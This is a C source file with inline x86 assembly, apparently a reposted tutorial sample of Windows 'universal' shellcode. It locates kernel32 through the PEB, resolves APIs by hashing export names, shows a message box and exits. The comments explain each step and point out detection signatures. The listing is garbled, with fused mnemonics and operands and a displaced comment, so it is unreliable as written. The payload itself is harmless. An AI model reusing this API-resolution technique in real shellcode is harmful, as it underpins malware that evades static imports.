Universal Shellcode Code

Source: Internet
Author: User

#include <stdio.h>
#include <windows.h>

// Classic Windows x86 "universal" shellcode, written as MSVC inline asm.
// It resolves LoadLibraryA, ExitProcess and MessageBoxA at run time by
// walking the PEB loader list and hashing export names, shows a message
// box, then calls ExitProcess. Because ExitProcess is reached from inside
// the asm block, `return 0` below is never executed.
//
// Register roles used throughout:
//   esi = read cursor over the three pushed API hashes (lodsd)
//   edi = write cursor over the three output slots that receive the
//         resolved addresses (stosd); once all three are stored,
//         [edi-4]=MessageBoxA, [edi-8]=ExitProcess, [edi-0xc]=LoadLibraryA
//   ebp = base of the module currently being searched (kernel32, then user32)
//   edx = running name hash inside hash_loop
//
// Defender note: the fs:[30h] PEB read, the export-directory walk and the
// ror-7/add name hash with the three constants below are exactly the
// features that static rules, emulators and API-hashing detectors key on;
// the constants themselves are a direct lookup signature for this family.
//
// NOTE(review): the listing is a whitespace-mangled paste (mnemonic and
// operands fused, inconsistent case, one comment fragment displaced onto
// the instruction text); the comments state the intended instruction.
int main ()
{
__asm
{
CLD//DF = 0 so lodsd/stosd below advance esi/edi forward
Push 0X1E380A6A//hash of MessageBoxA (user32.dll)
Push 0x4fd18963//hash of ExitProcess (kernel32.dll)
Push 0x0c917432//hash of LoadLibraryA (kernel32.dll) -- now at [esp]
mov Esi,esp//esi -> LoadLibraryA hash; lodsd walks the three hashes upward
Lea Edi,[esi-0xc]//edi -> first of three output slots just below the hashes, filled by stosd one per resolved API
====== open up some stack space
Xorebx,ebx
movbh,0x04//ebx = 0x400
Subesp,ebx//esp -= 0x400 so later pushes and calls land below the slot/hash area instead of overwriting it
====== pressed into "user32.dll"
movbx,0x3233//bytes "32"
pushebx//bytes "32\0\0"
push0x72657375//bytes "user" -> the stack now holds the NUL-terminated string "user32" (LoadLibraryA appends the default .dll extension)
Pushesp//argument for the LoadLibraryA call made later in find_lib_functions: pointer to "user32"
Xoredx,edx//edx = 0 (used as the index register in the fs:[edx+0x30] read below)
====== looking for Kernel32.dll's base address.
MOVEBX,FS:[EDX+0X30]//ebx = TEB->ProcessEnvironmentBlock (fs:[0x30])
MOVECX,[EBX+0XC]//ecx = PEB->Ldr (PEB_LDR_DATA)
MOVECX,[ECX+0X1C]//ecx = Ldr->InInitializationOrderModuleList.Flink (first entry)
MOVECX,[ECX]//advance to the second entry (the first is ntdll.dll, per the original note)
Base Address of movebp,[ecx+0x8]//intended: mov ebp,[ecx+0x8] -- ebp = DllBase of that entry ("Base Address of" belongs to this comment). NOTE(review): assumes the second list entry is kernel32.dll; this loader-list order is not guaranteed across Windows versions -- confirm on the target build

Find_lib_functions:
LODSD//eax = next hash, esi += 4 (order: LoadLibraryA, ExitProcess, MessageBoxA)
CMPEAX,0X1E380A6A//is this the MessageBoxA hash, i.e. are both kernel32 APIs already resolved?
Jnefind_functions//no: resolve it in the module ebp points to (kernel32.dll)
Xchgeax,ebp//yes: eax = kernel32 base (parked), ebp = hash
CALL[EDI-0X8]//LoadLibraryA("user32"): the pointer was pushed above at "Pushesp"; edi has advanced by two stosd, so [edi-8] is the LoadLibraryA slot
Xchgeax,ebp//ebp = user32 base returned in eax, eax = MessageBoxA hash; fall through to resolve it in user32

Find_functions:
Pushad//save all registers; pushad pushes eax first, so the hash sits at [esp+0x1c] for compare_hash
MOVEAX,[EBP+0X3C]//eax = e_lfanew (offset of the PE header from the module base)
movecx,[ebp+eax+0x78]//ecx = RVA of the export directory (DataDirectory[0] at PE header + 0x78)
addecx,ebp//ecx = VA of IMAGE_EXPORT_DIRECTORY
movebx,[ecx+0x20]//ebx = RVA of AddressOfNames
ADDEBX,EBP//ebx = VA of AddressOfNames
Xoredi,edi//edi = name index, 0 (pre-incremented below, so name index 0 itself is never examined)

Next_function_loop:
Incedi
MOV esi,[ebx+edi*4]//esi = RVA of name[edi]
ADDESI,EBP//esi = VA of the NUL-terminated export name
Cdq//edx = running hash, starts at 0: cdq sign-extends eax, which still holds e_lfanew (positive in practice)

Hash_loop:
Movsxeax,byte Ptr[esi]//eax = sign-extended next byte of the name
Cmpal,ah//for ASCII bytes movsx leaves ah = 0, so al == ah means the NUL terminator was reached
Jzcompare_hash
Ror edx,7//hash = ror(hash, 7) + byte
Addedx,eax
Incesi
Jmphash_loop

Compare_hash:
CMPEDX,[ESP+0X1C]//[esp+0x1c] = eax saved by pushad = hash being searched for
Jnznext_function_loop//no match: try the next export name


MOVEBX,[ECX+0X24]//ebx = RVA of AddressOfNameOrdinals
ADDEBX,EBP//ebx = VA of AddressOfNameOrdinals
MOV Di,[ebx+2*edi]//di = ordinal for name[edi] (16-bit entries; the upper half of edi is already 0)
MOVEBX,[ECX+0X1C]//ebx = RVA of AddressOfFunctions
Addebx,ebp//ebx = VA of AddressOfFunctions
Addebp,[ebx+4*edi]//ebp = module base + function RVA = VA of the API
Xchgeax,ebp//eax = API address (ebp temporarily holds e_lfanew; popad restores it below)
Popedi//edi = caller's output cursor (pushad pushed edi last, so it is on top)
Stosd//[edi] = API address; edi += 4

Pushedi//put the advanced edi back so popad hands it to the caller
Popad//restore everything else (eax = hash, ebp = module base)

cmpeax,0x1e380a6a//was that MessageBoxA, the last hash?
Jnefind_lib_functions//no: fetch the next hash

Function_call:
Xorebx,ebx
PUSHEBX//NUL terminator
push0x74736577//"west"
push0x6c696166//"fail" -> the stack holds "failwest\0"
Moveax,esp//eax -> "failwest"
Pushebx//uType = 0 (MB_OK)
Pusheax//lpCaption
Pusheax//lpText
Pushebx//hWnd = NULL
CALL[EDI-0X04]//MessageBoxA(NULL, "failwest", "failwest", 0); edi is now past all three slots, so [edi-4] is the MessageBoxA slot
Pushebx//uExitCode = 0
CALL[EDI-0X08]//ExitProcess(0): does not return, so the nops and `return 0` below are dead code
Nop
Nop
Nop
Nop
}
return 0;
}
